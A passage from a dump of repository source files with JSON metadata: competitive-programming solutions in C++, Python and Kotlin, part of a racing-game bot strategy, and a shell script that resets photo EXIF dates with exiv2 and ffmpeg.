ANGLE_THROW * 3 > PI || self.getAngleTo(car) - ANGLE_THROW * 3 < -PI)\r\n move.setSpillOil(true);\r\n }\r\n //if (world.getTick() > 210 && distToNext > prevDistance)\r\n //{\r\n //forceSlow = FORCE_SLOW_DOWN;\r\n //if (distToNext > tileSize * 5)\r\n //forceSlow /= 2;\r\n //}\r\n if (self.getRemainingOiledTicks() > 0)\r\n forceSlow = 0;\r\n if (world.getTick() > 210 && (distToNext > tileSize * 5 || snake) && world.getTick() >= 300)\r\n move.setUseNitro(true);\r\n int count = 0;\r\n for (auto car : world.getCars())\r\n count += car.getRemainingNitroTicks() > 100;\r\n if (world.getTick() <= game.getInitialFreezeDurationTicks() && count > 1 && world.getTick() >= 150)\r\n move.setUseNitro(true);\r\n}\r\n\r\nMyStrategy::MyStrategy() \r\n{\r\n directions[make_pair(1, 0)] = RIGHT;\r\n directions[make_pair(-1, 0)] = LEFT;\r\n directions[make_pair(0, 1)] = DOWN;\r\n directions[make_pair(0, -1)] = UP;\r\n#define rht RIGHT_HEADED_T\r\n#define lht LEFT_HEADED_T\r\n#define tht TOP_HEADED_T \r\n#define bht BOTTOM_HEADED_T\r\n#define cr CROSSROADS\r\n dir[VERTICAL][UP] = dir[VERTICAL][DOWN] = true;\r\n dir[HORIZONTAL][LEFT] = dir[HORIZONTAL][RIGHT] = true;\r\n\r\n dir[LEFT_TOP_CORNER][RIGHT] = dir[LEFT_TOP_CORNER][DOWN] = true;\r\n dir[RIGHT_TOP_CORNER][LEFT] = dir[RIGHT_TOP_CORNER][DOWN] = true;\r\n dir[LEFT_BOTTOM_CORNER][RIGHT] = dir[LEFT_BOTTOM_CORNER][UP] = true;\r\n dir[RIGHT_BOTTOM_CORNER][LEFT] = dir[RIGHT_BOTTOM_CORNER][UP] = true;\r\n\r\n dir[rht][UP] = dir[rht][DOWN] = dir[rht][RIGHT] = true;\r\n dir[lht][DOWN] = dir[lht][UP] = dir[lht][LEFT] = true;\r\n dir[bht][DOWN] = dir[bht][LEFT] = dir[bht][RIGHT] = true;\r\n dir[tht][UP] = dir[tht][LEFT] = dir[tht][RIGHT] = true;\r\n\r\n dir[cr][DOWN] = dir[cr][UP] = dir[cr][LEFT] = dir[cr][RIGHT] = true;\r\n freopen(\"lol\", \"w\", stdout);\r\n#ifdef debug\r\n writeln(FUUUUU);\r\n#endif\r\n}\r\n\r\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})" }, { "alpha_fraction": 0.41152074933052063, "alphanum_fraction": 0.4350230395793915, "avg_line_length": 22.33333396911621, "blob_id": "9aa047b2a1e26aee388ebe02d3175efa38201566", "content_id": "ad39c475bd59d294f5f812b5dbf20ad6dab2992b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2170, "license_type": "no_license", "max_line_length": 109, "num_lines": 93, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.23/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <iostream>\n#include <vector>\n#include <map>\n#include <deque>\n#include <algorithm>\n\nstruct sport\n{\n int laps_more;\n int finish_time;\n int speed;\n sport() {}\n sport(int a, int b, int s)\n {\n finish_time = a;\n laps_more = b;\n speed = s;\n }\n bool operator<(const sport &o) const\n {\n return o.speed < speed;\n }\n};\n\nusing namespace std;\n\nint main()\n{\n //freopen(\"output.txt\",\"w\",stdout);\n while (true)\n {\n int n;\n scanf(\"%d\",&n);\n if(n == 0)\n break;\n deque<sport> q1, q2;\n vector<sport> to_1;\n vector<sport> to_2;\n for(int i = 0; i < n; i++)\n {\n int t,c;\n scanf(\"%d %d\",&t,&c);\n\n to_1.push_back(sport(t,c,t));\n }\n int cur_time = 0;\n while(true)\n {\n if(to_1.empty() && to_2.empty() && q1.empty() && q2.empty())\n break;\n\n sort(to_1.begin(), to_1.end());\n sort(to_2.begin(), to_2.end());\n\n\n q1.insert(q1.begin(),to_1.begin(), to_1.end());\n to_1.clear();\n\n q2.insert(q2.begin(),to_2.begin(), to_2.end());\n to_2.clear();\n\n int next_time;\n if(!q1.empty() && !q2.empty())\n next_time = min(q1.back().finish_time,q2.back().finish_time);\n else if(q1.empty())\n {\n next_time = q2.back().finish_time;\n }\n else\n next_time = q1.back().finish_time;\n\n while(!q1.empty() && q1.back().finish_time <= next_time)\n {\n to_2.push_back(sport(next_time + q1.back().speed,q1.back().laps_more,q1.back().speed));\n q1.pop_back();\n }\n\n while(!q2.empty() && q2.back().finish_time <= next_time)\n {\n if(q2.back().laps_more != 1)\n to_1.push_back(sport(next_time + q2.back().speed,q2.back().laps_more-1,q2.back().speed));\n q2.pop_back();\n }\n\n cur_time = next_time;\n\n }\n\n printf(\"%d\\n\",cur_time);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5123003125190735, "alphanum_fraction": 0.519808292388916, "avg_line_length": 30.776649475097656, "blob_id": "85d15e3afdc685e54f92e1289664704e6f2ac653", "content_id": "6f8aef80743ee02beb80cb2f7afea5cd1e0d9381", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6260, "license_type": "no_license", "max_line_length": 928, "num_lines": 197, "path": "/CodeForce/0391/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nconst int N = 50001;\nint n, m, k;\n\n//copypasted from Megabyte777;\ntemplate <class Scalar>\nstruct range_t;\ntypedef range_t<double> range;\ntypedef range_t<float> range_f;\ntypedef range_t<int> range_i;\ntemplate <class Scalar>\nstruct range_t\n{\n Scalar inf, sup, r;\n\n range_t(Scalar inf, Scalar sup, Scalar r)\n : inf(inf)\n , r(r)\n , sup(sup)\n {}\n\n range_t()\n : inf(0)\n , sup(-1)\n {}\n\n bool is_empty() const { return inf > sup; }\n\n bool contains(Scalar x) const { return (inf <= x) && (x <= sup); }\n\n static range_t maximal()\n {\n static const Scalar max_val = std::numeric_limits<Scalar>::max();\n return range_t(-max_val, max_val);\n }\n};\n\ntemplate <class Scalar>\nrange_t<Scalar> const operator & (range_t<Scalar> const & a, range_t<Scalar> const & b)\n{\n return range_t<Scalar>(std::max(a.inf, b.inf), std::min(a.sup, b.sup));\n}\n\ninline float center(range_f const & r)\n{\n return .5f + r.inf / 2.f + r.sup / 2.f;\n}\n\ntemplate <class Scalar>\nScalar size(range_t<Scalar> const & r)\n{\n return r.sup - r.inf;\n}\n\ntemplate <typename Scalar>\nstruct interval_tree\n{\n ~interval_tree()\n {\n delete left_child;\n delete right_child;\n }\n\n interval_tree(std::vector<range_t<Scalar> > const &segments)\n : left_child(0)\n , right_child(0)\n {\n if (segments.size() == 0)\n return;\n std::vector<Scalar> coordinates;\n for (range_t<Scalar> const &r : segments)\n {\n coordinates.push_back(r.inf);\n coordinates.push_back(r.sup);\n }\n std::nth_element(coordinates.begin(), coordinates.begin() + coordinates.size() / 2, coordinates.end());\n mid = coordinates[coordinates.size() / 2];\n std::vector<range_t<Scalar> > left, right;\n for (range_t<Scalar> const &r : segments)\n {\n if (r.sup < mid)\n left.push_back(r);\n if (r.inf > mid)\n right.push_back(r);\n if (r.inf <= mid && r.sup >= mid)\n {\n left_segments.push_back(r);\n right_segments.push_back(r);\n }\n }\n std::sort(left_segments.begin(), left_segments.end(),\n [] (range_t<Scalar> const &a, range_t<Scalar> const &b)\n {\n return a.inf < b.inf;\n }\n );\n std::sort(right_segments.begin(), right_segments.end(),\n [] (range_t<Scalar> const &a, range_t<Scalar> const &b)\n {\n return a.sup > b.sup;\n }\n );\n left_child = new interval_tree(left);\n right_child = new interval_tree(right);\n }\n\n std::vector<range_t<Scalar> > get(Scalar q)\n {\n if (left_segments.empty())\n return std::vector<range_t<Scalar> >();\n std::vector<range_t<Scalar> > result;\n if (q < mid)\n result = left_child->get(q);\n if (q > mid)\n result = right_child->get(q);\n if (q < mid)\n {\n for (int i = 0; i < left_segments.size() && left_segments[i].inf <= q; ++i)\n result.push_back(left_segments[i]);\n }\n else\n {\n for (int i = 0; i < right_segments.size() && right_segments[i].sup >= q; ++i)\n result.push_back(right_segments[i]);\n }\n return std::move(result);\n }\n\nprivate:\n interval_tree *left_child, *right_child;\n Scalar mid;\n std::vector<range_t<Scalar> > left_segments, right_segments;\n\n interval_tree()\n : left_child(0)\n , right_child(0)\n {}\n};\n\nvector<range_t<int>> segments;\n\nvoid run()\n{\n int l, r, q;\n readln(n, m);\n int e = 0;\n fori(n)\n readln(l, r, q),\n segments.pb(range_t<int>(r, r + q, l)),\n e = max(e, q);\n interval_tree<int> it(segments);\n int ans = 0;\n fori(m)\n {\n if (ans / 2 == e)\n break;\n readln(l, r, q);\n if (q * 2 < ans)\n continue;\n auto vec = it.get(r);\n for (auto seg : vec)\n if (!(l >= seg.r || l + q < seg.r || seg.sup - seg.inf < ans / 2))\n ans = max(ans, min(min(seg.sup - r, r - seg.inf), min(seg.r - l, l + q - seg.r)));\n }\n cout << ans << endl;\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.41304346919059753, "alphanum_fraction": 0.5, "avg_line_length": 12.142857551574707, "blob_id": "f3697266d0918e5bb69b47164b2660620cb82b6b", "content_id": "032befb4cd4a138556cb62820917ab9fdb2ff510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 92, "license_type": "no_license", "max_line_length": 18, "num_lines": 7, "path": "/CodeForce/1679/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 1000\nq = 2 * 10 ** 5\nprint(n)\nprint('?' * n)\nprint(q)\nfor i in range(q):\n print('a')\n" }, { "alpha_fraction": 0.39436620473861694, "alphanum_fraction": 0.42756539583206177, "avg_line_length": 27.399999618530273, "blob_id": "1e69c89f8fa65425da587c1c37651628b249a352", "content_id": "e1f0e9152d361d9ad77be2c16dbc6450e46ee570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 994, "license_type": "no_license", "max_line_length": 74, "num_lines": 35, "path": "/2021/yandexBackendFinal/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, l = map(int, input().split())\n\nusers = [[] for i in range(n)]\nfor _ in range(n):\n c = int(input())\n for i in range(c):\n users[_].append(input().split('-'))\n\ndef formatM(m):\n return '30' if m == 30 else '00'\n\ncount = 0\nfor start in range(10, 20):\n for half in range(0, 60, 30):\n endH = start + l // 60\n endM = half + (l % 60)\n if endM == 60:\n endH += 1\n endM = 0\n if endH < 20 or endH == 20 and endM == 0:\n timeStart = f'{start}:{formatM(half)}'\n timeEnd = f'{endH}:{formatM(endM)}'\n ok = True\n for i in range(n):\n can = True\n for times in users[i]:\n if not (times[0] >= timeEnd or times[1] <= timeStart):\n can = False\n if not can:\n ok = False\n if ok:\n count += 1\n print(f'{timeStart}-{timeEnd}')\nif count == 0:\n print('No way')\n" }, { "alpha_fraction": 0.3308270573616028, "alphanum_fraction": 0.4661654233932495, "avg_line_length": 18, "blob_id": "81c33cb8a021ce5deeab99f030d046c0f40fb278", "content_id": "4823b752c088f2cd80b494deda48c76311195d60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 48, "num_lines": 7, "path": "/CodeForce/0516/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "input()\ns=input()\na=\"\"\nt=[a,a,\"2\",\"3\",\"223\",\"5\",\"53\",\"7\",\"7222\",\"7332\"]\nfor c in s:\n a+=t[int(c)]\nprint(''.join(sorted(a)[::-1]))\n" }, { "alpha_fraction": 0.3347107470035553, "alphanum_fraction": 0.39669421315193176, "avg_line_length": 16.285715103149414, "blob_id": "242c5e9e32f3a5e9f6f7bf4cc43ce00ac0dea267", "content_id": "5736df120d39cc099012b7a67c8a482f703c82c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 242, "license_type": "no_license", "max_line_length": 57, "num_lines": 14, "path": "/staff/binSearchExample.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"library.h\"\n\nint main()\n{\n auto f = [](int x)\n {\n return power(x + 123, 3);\n };\n cout << fixed << (bin_search(-1000, 1000, [&f](int m)\n {\n return f(m) > 0;\n }, 1)) << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.3795892894268036, "alphanum_fraction": 0.43248289823532104, "avg_line_length": 41.28947448730469, "blob_id": "666c30a8e33c77c29e90c7a67c33cf12d951c465", "content_id": "2debcf666703d0b5ece054d94a600c267ca4405d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1607, "license_type": "no_license", "max_line_length": 127, "num_lines": 38, "path": "/scripts/fixDate.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "dateRegex=\"^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]\\ [0-9][0-9]:[0-9][0-9]:[0-9][0-9]$\"\ndateShortRegex=\"^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9] +\"\nfor f in \"$@\"; do\n date=$(exiv2 -p e \"$f\" | grep 'Exif.Photo.DateTimeOriginal' | awk '{print $4 \" \" $5;}' | sed 's/:/-/' | sed 's/:/-/')\n shift='+0300'\n echo \"Trying date $f '$date'\"\n if [[ ${date} = '' ]]; then\n date=$(ffmpeg -i \"$f\" 2>&1 | grep creation_time | head -1 | awk '{ print $3;}' | sed 's/[TZ]/ /g' | sed 's/\\.000000//')\n if [[ ${date} = '' ]]; then\n echo \"SKIP $f $date\"\n ffmpeg -i \"$f\"\n continue\n fi\n shift='+0000'\n elif ! [[ ${date} =~ $dateRegex ]]; then\n if [[ ${date} =~ $dateShortRegex ]]; then\n date=\"${date}00:00\"\n echo \"Found short date $f $date\"\n else\n date=$(exiv2 -p e \"$f\" | grep 'Exif.Image.DateTime' | awk '{print $4 \" \" $5; }' | sed 's/:/-/' | sed 's/:/-/')\n echo \"Trying original $f $date\"\n if ! [[ ${date} =~ $dateRegex ]]; then\n if [[ ${date} =~ $dateShortRegex ]]; then\n date=\"${date}00:00\"\n echo \"Found short date $f $date\"\n else\n echo \"SKIP $f $date\"\n exiv2 -p e \"$f\"\n continue\n fi\n fi\n fi\n fi\n echo \"Date found $f $date $shift\"\n exiv2 -v -M\"set Exif.Image.DateTime $date\" $f 1>/dev/null 2>&1\n exiv2 -v -M\"set Exif.Photo.DateTimeOriginal $date\" $f 1>/dev/null 2>&1\n touch -d \"$date $shift\" \"$f\"\ndone\n" }, { "alpha_fraction": 0.46226203441619873, "alphanum_fraction": 0.47502800822257996, "avg_line_length": 27.80645179748535, "blob_id": "4ffd5337a165410cb32fb2b3df9e52a10d646300", "content_id": "b8d9a14a466b418fac0da961164c9f48d527c937", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 4465, "license_type": "no_license", "max_line_length": 96, "num_lines": 155, "path": "/CodeForce/1570/I.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport java.lang.Integer.min\nimport kotlin.collections.*// }}}\n\nprivate const val MAX_N = 100_001\nprivate const val P = 2000\n\nprivate val cnt = IntArray(MAX_N) { 0 }\nprivate val ord = IntArray(MAX_N) { 0 }\nprivate val bounds = Array(MAX_N) { Point(MAX_N, 0) }\n\ndata class Query(val t: Int, val l: Int, val r: Int, val k: Int, var index: Int)\ndata class Update(val index: Int, val from: Int, val to: Int)\ndata class Point(var x: Int, var y: Int)\n\nprivate fun run() {\n val (n, m) = readln()\n val a = readln()\n val queries = ArrayList<Query>()\n val updates = ArrayList<Update>()\n\n repeat(m) {\n val request = readln()\n var (t, l, r) = request\n l -= 1\n if (t == 1) {\n queries.add(Query(updates.size, l, r - 1, request[3], queries.size))\n } else {\n updates.add(Update(l, a[l], r))\n a[l] = r\n }\n }\n for ((i, from) in updates.reversed())\n a[i] = from\n\n val ans = IntArray(queries.size)\n queries.sortWith(compareBy({ it.t / P }, { it.l / P }, { it.r }))\n bounds[0] = Point(0, MAX_N - 1)\n var L = 0\n var R = -1\n var T = 0\n\n fun next(i: Int) = bounds[ord[i]].y + 1\n fun count(i: Int) = bounds[ord[i]].y - bounds[ord[i]].x + 1\n\n fun add(x: Int) {\n val c = cnt[x]++\n ord[bounds[c].x]++\n bounds[c + 1].y = bounds[c].x\n if (bounds[c + 1].x == MAX_N)\n bounds[c + 1].x = bounds[c].x\n if (bounds[c].x == bounds[c].y)\n bounds[c].x = MAX_N - 1\n ++bounds[c].x\n }\n fun del(x: Int) {\n val c = cnt[x]--\n ord[bounds[c].y]--\n if (bounds[c - 1].x == MAX_N)\n bounds[c - 1].y = bounds[c].y\n bounds[c - 1].x = bounds[c].y\n if (bounds[c].x == bounds[c].y)\n bounds[c].x = MAX_N\n --bounds[c].y\n }\n fun update(index: Int, forward: Boolean) {\n var (i, from, to) = updates[index]\n if (!forward) to = from\n if (i in L..R) {\n del(a[i])\n add(to)\n }\n a[i] = to\n }\n for ((t, l, r, k, id) in queries) {\n while (T < t) update(T++, true)\n while (T > t) update(--T, false)\n while (R < r) add(a[++R])\n while (L > l) add(a[--L])\n while (R > r) del(a[R--])\n while (L < l) del(a[L++])\n var res = MAX_N\n var i = 0\n var j = 0\n var sum = 0\n\n while (i < MAX_N && ord[i] > 0) {\n while (j < MAX_N && ord[j] > 0 && sum < k) {\n sum += count(j)\n j = next(j)\n }\n if (sum >= k)\n res = min(res, ord[i] - ord[j - 1])\n sum -= count(i)\n i = next(i)\n }\n if (res == MAX_N)\n ans[id] = -1\n else\n ans[id] = res\n }\n writeln(ans.joinToString(\"\\n\"))\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n run()\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.44218674302101135, "alphanum_fraction": 0.455249160528183, "avg_line_length": 31.809524536132812, "blob_id": "7f34a930fbb35c337336f9059f2983a108132ecd", "content_id": "98437da2333e234e2652ae1c1f31ad3443323ed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 928, "num_lines": 63, "path": "/CodeForce/0291/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint mn = INF, mx = 0;\nvector<int> a(1001);\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nbool readl(vector<int> &a, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a[i] = x;\n }\n return true;\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int count = 0, n;\n readln(n);\n bool f = false;\n readl(a, n);\n {\n for (int i = 1, c = 1; i <= n; i++)\n {\n if (!a[i])\n continue;\n c = 1;\n for (int j = i + 1; j <= n; j++)\n if (a[j] == a[i])\n ++c;\n if (c > 2)\n {\n f = true;\n break;\n }\n if (c == 2)\n count++;\n }\n }\n if (f)\n count = -1;\n writeln(count);\n return 0;\n}\n" }, { "alpha_fraction": 0.5289506316184998, "alphanum_fraction": 0.5462319850921631, "avg_line_length": 35.92763137817383, "blob_id": "5a0602c794b1bbccf3cfd75c1ee081b8b63167e1", "content_id": "30c409e72bd62f74c7282ef344c6a2a11a28e9e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5613, "license_type": "no_license", "max_line_length": 184, "num_lines": 152, "path": "/2020/snws4/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef double ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n\n//point\n#define pointtt template<typename T = int>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? dist(z, a) < dist(z, b) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n point(){}\n point(T _x, T _y) : x(_x), y(_y) {}\n point operator+(const point& b) const { return point(x + b.x, y + b.y); }\n point operator-(const point& b) const { return point(x - b.x, y - b.y); }\n point operator-() const { return point(-x, -y); }\n T operator*(const point& b) const { return x * b.x + y * b.y; }\n T operator^(const point& b) const { return x * b.y - y * b.x; }\n T operator!() const { return x * x + y * y; }\n bool operator<(const point& b) const { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(const point<T>&a,const point<T>&b){return!point<T>(a-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(const point<T>&a,const point<T>&b,const point<T>&c){return{abs((a-b)*c)+(a^b),dist(a,b)};}\npointtt int orientation(const point<T>&a,const point<T>&b,const point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\n\n//convexHull\npointtt void convexHull(vector<point<T>>&a){sort(a.begin(),a.end());int n=a.size(),j=-1,k=0;ROF(i,n-2,0)a.push_back(a[i]);fori(a.size()){for(;j>k&&orientation(a[j-1],a[j],a[i])!=1;--j)\n ;a[++j]=a[i];if(!k&&i==n-1)k=j;}a.resize(j);}\n//reflect point C from line AB\npointtt point<T> reflect(const point<T>&a,const point<T>&b,const point<T>&c){\n T A = a.y - b.y;\n T B = b.x - a.x;\n T C = a ^ b;\n T D = A * A - B * B;\n T S = A * A + B * B;\n return {(-D * c.x - 2 * A * B * c.y - 2 * A * C) / S, (D * c.y - 2 * A * B * c.x - 2 * B * C) / S};\n};\n//}}}\n\nvoid run()\n{\n ints(n);\n auto nxt = [&](int i) { return (i + 1) % n; };\n vector<double> coeffs(n);\n vector<point<ll>> a(n);\n point<ll> v;\n fori(n)\n readln(a[i], coeffs[i]);\n readln(v);\n point<ll> w = {0, 0};\n double k = 1;\n int cc = 0;\n\n int last = -1;\n\n fori(n)\n if (orientation(w, a[i], a[nxt(i)]) == 0)\n last = i;\n\n while (k >= 0.0001)\n {\n ++cc;\n fori(n)\n {\n auto x = a[i];\n auto y = a[nxt(i)];\n if (last == i)\n continue;\n int o1 = orientation(w, v, x);\n int o2 = orientation(w, v, y);\n if (o1 == 0 || o2 == 0)\n {\n writeln(cc);\n return;\n }\n if (o1 != o2)\n {\n last = i;\n w = reflect(x, y, w);\n v = reflect(x, y, v);\n k *= coeffs[i];\n break;\n }\n }\n }\n writeln(cc);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto 